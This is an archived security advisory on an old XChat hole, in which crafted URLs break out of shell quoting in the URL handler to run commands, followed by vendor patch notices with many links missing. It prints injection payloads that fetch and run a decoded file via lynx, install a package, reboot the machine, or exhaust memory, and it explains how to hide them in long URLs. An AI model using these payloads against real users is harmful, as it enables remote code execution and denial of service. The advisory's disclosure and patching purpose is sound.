Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Linux :: Apps N-Z :: xchatrt.htm

Xchat possible root hack





    Zenith Parsec found  following.  Just  to show what  we mean about
    the possible  danger, start  Netscape and  enter in  xchat, (in  a
    channel or query window) the following URL.'`lynx${IFS}-dump${IFS}|uudecode;./thingee`'

    Right click on it, and select the Netscape (Existing) or  Netscape
    (New Window) option.   Wait until the  URL loads.   In a shell  on
    your machine type

        tail -2 ~/.bash_profile

        echo You've been hax0red
        echo --zen

    (oops... should've been You\'ve been hax0red, but u get the  idea)
    Lucky it wasn't  a script that  was well written,  and designed to
    use script kiddie stuff to hack root or something, eh?

    For the  non-lazy and  the lazy  who were  impressed by  the quick

    The  hole  is  in  the  URL  Handler section.  Netscape (Existing)
    causes XChat to run the command

        netscape -remote 'openURL(%s)'

    where the %s is replaced by the selected URL eg:

    causes the command

        netscape -remote 'openURL('

    which opens  that page.   Netscape (Run  New) causes  XChat to run
    the command netscape %s and so on.

    Backticking and shell expansion.  Imagine if someone types:

        l00k @ d15 k3w1 w@r3z  5173!`date`y='`date`'

    with the (Existing)  or (New Window)  options and others  that use
    'openURL(%s)' type commands to start the program, you get:

        netscape -remote 'openURL(`date`y='`date`')'

    count the 's and u will see that at the 2nd `date` they are closed
    and then reopened, so that `date` isn't escaped anymore... leaving
    it free to run, which it does.

    With the (Run New) type commands (that is  command %s  with no  's
    around the %s) you get:


    which has the  1st `date` unescaped  (no 's around  it) and so  it
    executes.  In  real life though,  its unlikely anyone  would click
    on a URL like


    though.   Still, not  all that  useful, ha?   Well, URLs  can  get
    pretty long.   For example,  a cgi-bin  call to  somethng can  get
    quite long.

    compare that to:`reboot`+%2bexploit&stq=10&filter='`reboot`'&user=b0dee0132&split=1

    quick glance... nothing wrong with it.

    Well, you seem to have a limitation, in that putting spaces in
    doesn't work, nor does redirection.

    Well, you can put spaces in.   The $IFS variable is probably  set.
    And who needs redirection, when you can do this:'"`rpm${IFS}-i${IFS}`"'

    (For (Existing) or (New Window))"`rpm${IFS}-i${IFS}`"

    By the way, a way to exploit this that that's not too blatent,  if
    you don't mind just DOS-ing the victim, is something like`yes`

    (warning, following said URL in xchat will eat all memory you  are
    allowed  to  eat  on  your   system,  and  thus  tends  to   crash
    poorly-configured linux systems).


    It seems that this bug  will only affect XChat versions  1.3.9 and
    above, up  to and  including 1.4.2  (the devel  series may also be
    vulnerable, as there is no  mention on the changelog page  of this
    bug.) (release 1.3.9 was the first to have editable URL  handlers,
    which seem  to be  the cause).   Verfified bug  exists on  [x]chat

    Version 1.2.1 of xchat does not appear to be vulnerable.

    For Red Hat:


    For Linux-Mandrake:


    For Conectiva Linux:

    Just to chime in here,  for distributions who haven't released  an
    update the source for 1.4.2  is available on the author's  website
    here for the impatient:

    The latest stable release of debian is not vulnerable. Others:

    Slackware 7.1 does ship with xchat.  It is not vulnerable.

    An  essential  update  is  available  immediately from Helix Code,
    Inc.   via the  Helix GNOME  Updater and  from the following URLs.
    For Caldera OpenLinux eDesktop 2.4 systems:

    For Debian GNU/Linux potato (2.2) and woody systems:

    For LinuxPPC systems:

    For Linux Mandrake systems:

    For Red Hat Linux systems:

    For Solaris running on UltraSparc systems:

    For SuSE 6.3 systems:

    For SuSE 6.4 systems:

    For TurboLinux systems:

    For Linux-Mandrake:

        Linux-Mandrake 7.0: 7.0/RPMS/xchat-1.4.1-4mdk.i586.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/xchat-1.4.1-4mdk.i586.rpm

    For FreeBSD:

    Users of Slackware  7.0, 7.1, and  -current are urged  to upgraded
    to  the  xchat.tgz  package  available  in  the Slackware -current

    Fo TurboLinux:

    Note:  You  must  rebuild  and  install  the  RPM if you choose to
    download and install the SRPM.   Simply installing the SRPM  alone

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH